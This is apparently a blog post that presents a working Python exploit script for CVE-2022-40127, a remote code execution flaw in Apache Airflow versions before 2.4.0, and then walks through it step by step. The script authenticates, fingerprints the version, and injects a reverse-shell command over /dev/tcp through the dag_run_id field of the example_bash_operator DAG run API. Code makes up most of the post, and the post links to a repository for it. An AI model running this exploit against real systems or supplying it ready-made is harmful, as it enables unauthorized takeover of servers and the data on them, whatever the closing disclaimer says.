RCE via example DAG in Apache Airflow (CVE-2022-40127) — Exploit

7 min read · Aug 22, 2023

Summary

The provided Python code is an exploit script targeting CVE-2022-40127, a Remote Code Execution (RCE) vulnerability in Apache Airflow versions before 2.4.0. The vulnerability arises from insufficient validation of user-supplied input, which allows an attacker to execute arbitrary code on the target system.

General

1. import argparse
2. import re
3. import requests
4. import json
5. from packaging import version
6.
def get_csrf_token(url):
    """Fetch the login page and extract the CSRF token and initial session cookie.

    Args:
        url: Base URL of the Airflow web server, without a trailing slash.

    Returns:
        A ``(session_cookie, csrf_token)`` tuple. ``session_cookie`` is the
        value of the ``session`` cookie set by the login page, or ``None``
        when the response carries no such cookie.

    Raises:
        SystemExit: With status 1 when the login page cannot be fetched or
            no token is found in it.
    """
    try:
        # A timeout keeps the script from hanging on an unresponsive host.
        response = requests.get(url + "/login/", timeout=10)
    except requests.RequestException as err:
        print(f"[-] Could not fetch the login page: {err}")
        raise SystemExit(1) from None

    # Matches an <input> whose only attributes before value= are type/name/id
    # and captures the value attribute.
    pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
    match = re.search(pattern, response.text)
    if match is None:
        print("[-] CSRF token not found. Exiting...")
        raise SystemExit(1)

    print("[+] CSRF token found.")
    return response.cookies.get('session'), match.group(1)
20.
def login(url, username, password, cookie, csrf_token):
    """Log in to the Airflow web UI and return the authenticated session cookie.

    Args:
        url: Base URL of the Airflow web server, without a trailing slash.
        username: Account name submitted in the login form.
        password: Password submitted in the login form.
        cookie: Value of the pre-login ``session`` cookie.
        csrf_token: CSRF token extracted from the login page.

    Returns:
        The value of the first cookie in the response's ``Set-Cookie`` header.

    Raises:
        SystemExit: With status 1 on invalid credentials, a non-200 response,
            a connection error, or a response that sets no cookie. Every
            failure path exits so the caller never continues with ``None``.
    """
    try:
        response = requests.post(
            url + "/login/",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": f"session={cookie}",
            },
            data={"csrf_token": csrf_token, "username": username, "password": password},
            timeout=10,
        )
    except requests.RequestException as err:
        print(f"[-] Login request failed: {err}")
        raise SystemExit(1) from None

    if "Invalid login. Please try again." in response.text:
        print("[-] Login was not successful due to invalid credentials.")
        raise SystemExit(1)

    if response.status_code != 200:
        print("[-] Something went wrong with the login process.")
        raise SystemExit(1)

    if "Set-Cookie" not in response.headers:
        print("[-] Login response did not set a session cookie.")
        raise SystemExit(1)

    # Take "name=value" from the first cookie; split only on the first "=" so
    # a value that itself contains "=" is not truncated.
    first_cookie = response.headers["Set-Cookie"].split(";")[0]
    session_cookie = first_cookie.split("=", 1)[1]
    print(f"Login was successful. Captured session cookie: {session_cookie}")
    return session_cookie
43.
def check_airflow_version(url, session_cookie):
    """Return the Airflow version string found on the ``/home`` page.

    The page is requested with the given session cookie and searched for a
    ``vX.Y.Z`` marker. The script exits with status 1 when none is found.
    """
    auth_headers = {"Cookie": f"session={session_cookie}"}
    home_page = requests.get(url + "/home", headers=auth_headers)

    match = re.search(r'v(\d+\.\d+\.\d+)', home_page.text)
    if not match:
        print("[-] Airflow version not found.")
        exit(1)

    found_version = match.group(1)
    print(f"[+] Airflow version found: {found_version}")
    return found_version
58.
def check_example_bash_operator_exists(url, session_cookie):
    """Report whether the ``example_bash_operator`` DAG is listed by the API.

    Args:
        url: Base URL of the Airflow web server, without a trailing slash.
        session_cookie: Authenticated ``session`` cookie value.

    Returns:
        ``True`` when a DAG with ``dag_id == "example_bash_operator"`` appears
        in the ``/api/v1/dags`` response. ``False`` otherwise, including when
        the request fails, the response is not 200, or the body is not the
        expected JSON object.
    """
    endpoint = f'{url}/api/v1/dags'
    headers = {'Cookie': f'session={session_cookie}'}
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
    except requests.RequestException as err:
        print(f"[-] Could not query the DAG list: {err}")
        return False

    if response.status_code != 200:
        # Error responses carry no "dags" key; report instead of raising KeyError.
        print(f"[-] Could not list DAGs (HTTP {response.status_code}).")
        return False

    try:
        body = response.json()
    except ValueError:
        print("[-] DAG list response was not valid JSON.")
        return False

    dags = body.get("dags", []) if isinstance(body, dict) else []
    # NOTE(review): only the first page of results is inspected; the list
    # endpoint is presumably paginated — confirm against the API reference.
    return any(dag.get("dag_id") == "example_bash_operator" for dag in dags)
70.
def upload_reverse_shell(url, session_cookie, host, port):
    """Upload a reverse shell to the Apache Airflow server

    Builds a payload string from ``host`` and ``port`` and submits it as the
    ``dag_run_id`` of a new run of the ``example_bash_operator`` DAG via the
    REST API, then prints whether the request returned HTTP 200.

    Args:
        url: Base URL of the Airflow web server.
        session_cookie: Authenticated ``session`` cookie value.
        host: Host interpolated into the payload.
        port: Port interpolated into the payload.

    Returns:
        None. The outcome is reported on stdout only.
    """
    payload = f'\";sh -i >& /dev/tcp/{host}/{port} 0>&1;\""'
    print (f"[+] Using the following payload: {payload}")

    # The payload travels in the dag_run_id field; conf is sent empty.
    data = {"conf": {},"dag_run_id": payload}

    headers = {
        "accept": "application/json",
        "Content-Type": "application/json",
        "Cookie": f"session={session_cookie}"
    }

    response = requests.post(
        f"{url}/api/v1/dags/example_bash_operator/dagRuns",
        headers=headers,
        json=data
    )

    # NOTE(review): response_data is never used below; this call presumably
    # raises when the body is not JSON, which would skip the diagnostics.
    response_data = response.json()

    if response.status_code == 200:
        print(f"[+] Exploit seems to work. Wait for a connection on port {port}.")
    else:
        print("[-] Something is wrong with the exploit. Here is the response data:")
        print(response.text)
97.
def main():
    """Parse command-line arguments and run the checks in order.

    Steps: validate arguments, obtain a session cookie (supplied directly or
    by logging in), read the Airflow version, confirm the example DAG exists,
    and, only when ``-a`` is given, call ``upload_reverse_shell``.

    Raises:
        SystemExit: With status 1 on invalid arguments, when the target
            version is not below 2.4.0, or when the example DAG is missing.
    """
    parser = argparse.ArgumentParser(description="Apache Airflow < 2.4.0 DAG example_bash_operator RCE exploit script (CVE-2022-40127).")
    # Username and password are optional at the parser level so that a session
    # cookie alone is accepted; the combination is validated below.
    parser.add_argument("-u", "--username", help="Airflow username")
    parser.add_argument("-p", "--password", help="Airflow password")
    parser.add_argument("-url", required=True, help="URL of the Apache Airflow host. Use http(s):// prefix.")
    parser.add_argument("-s", "--session_cookie", help="Session cookie if you already have it")
    parser.add_argument("-a", "--attack", action="store_true", help="Create a reverse shell on the host")
    parser.add_argument("-host", "--rev-shell-host", help="Reverse shell IP/host to bind to from Airflow server")
    parser.add_argument("-port", "--rev-shell-port", help="Reverse shell port to bind to from Airflow server")

    args = parser.parse_args()

    # Check if both username and password or session_cookie are provided
    if not (args.username and args.password) and not args.session_cookie:
        print("[-] Either provide username and password or session cookie.")
        raise SystemExit(1)

    # Validate URL schema
    url = args.url
    if not url.startswith(("http://", "https://")):
        print("[-] Invalid URL scheme. It should start with 'http://' or 'https://'.")
        raise SystemExit(1)
    url = url.rstrip("/")

    # Check if both host and port are provided
    if args.attack and not (args.rev_shell_host and args.rev_shell_port):
        print("[-] The host ip and port for the reverse shell to bind to also should be provided in attack mode. Exiting...")
        raise SystemExit(1)

    # Get the session cookie
    if args.session_cookie:
        session_cookie = args.session_cookie
    else:
        initial_session_cookie, csrf_token = get_csrf_token(url)
        session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)

    airflow_version = check_airflow_version(url, session_cookie)

    if version.parse(airflow_version) < version.parse("2.4.0"):
        print("[+] Version is vulnerable.")
    else:
        print("[-] Not vulnerable. Version is above 2.3.4. Exiting...")
        # Stop here: the message promises an exit, and nothing further should
        # be sent to a target that is not affected.
        raise SystemExit(1)

    if check_example_bash_operator_exists(url, session_cookie):
        print("[+] Yay! The example_bash_operator example DAG exists.")
    else:
        print("[-] No example_bash_operator DAG exists. Exploitation is not possible. Exiting...")
        raise SystemExit(1)

    if args.attack:
        print("[+] Proceeding with the exploit. Trying to upload reverse shell.")
        upload_reverse_shell(url, session_cookie, args.rev_shell_host, args.rev_shell_port)
    else:
        print("[+] Exploit seems to work. Run the script with \"-a\" option to get a reverse shell.")


if __name__ == "__main__":
    main()

Description

You can find the script here:

https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE

Proof:

High-Level Overview

The script starts by importing the necessary libraries. It defines several functions to perform various tasks, such as retrieving the CSRF token, logging in to the Apache Airflow web interface, checking the version of Airflow, verifying the existence of a specific example DAG (example_bash_operator), and finally, uploading a reverse shell payload to the vulnerable server.

The main function orchestrates the exploit process and is responsible for parsing command-line arguments, checking the validity of the provided parameters, and executing the necessary steps to exploit the vulnerability.

Step-by-Step Overview

The script starts by parsing command-line arguments provided by the user using the argparse module. These arguments include the Airflow username, password, the URL of the Apache Airflow host, session cookie (if available), an attack mode flag (-a), and the reverse shell host and port.
The script checks whether the user provided either a session cookie or both a username and password. If not, it displays an error message and exits.
The script validates the URL schema, ensuring it starts with either “http://” or “https://”. If the URL is invalid, an error message is shown, and the script exits.
If the attack mode is enabled (-a option provided), the script checks if both the reverse shell host and port are provided. If not, it displays an error message and exits.
The get_csrf_token function is used to obtain the CSRF token required for the login process. It sends a GET request to the Airflow login page, extracts the CSRF token from the response, and returns the initial session cookie and CSRF token.
The login function performs the login process by sending a POST request to the login page with the provided username, password, and CSRF token. It captures the session cookie from the response headers upon a successful login.
The check_airflow_version function retrieves the Airflow version by sending a GET request to the Airflow home page and parsing the version string from the response.
The script checks if the Airflow version is vulnerable (i.e., below version 2.4.0) using packaging.version. If the version is not vulnerable, an error message is displayed, and the script exits.
The check_example_bash_operator_exists function checks if the example_bash_operator DAG exists on the target server. It queries the Airflow API for a list of DAGs and searches for the example_bash_operator DAG in the response.
If the example_bash_operator DAG exists, the script proceeds with the exploit; otherwise, it displays an error message and exits.
If the attack mode (-a option) is enabled, the script proceeds to upload a reverse shell payload using the upload_reverse_shell function. The payload is constructed to execute a reverse shell connecting back to the provided host and port.
The reverse shell payload is uploaded to the vulnerable Airflow server by sending a POST request to the Airflow API with the payload embedded in the dag_run_id field of the request.
The script checks the response status code to determine if the exploit was successful. If successful, it prints a message instructing the attacker to wait for a connection on the specified port.
If the exploit fails, an error message along with the response data is displayed.
If the attack mode is not enabled, the script suggests running it with the -a option to perform the reverse shell exploit.

Note that the script should only be used for ethical and legal purposes, such as vulnerability testing on systems with proper authorization. Unauthorized use of this code or attempting to exploit systems without proper permission is illegal and unethical.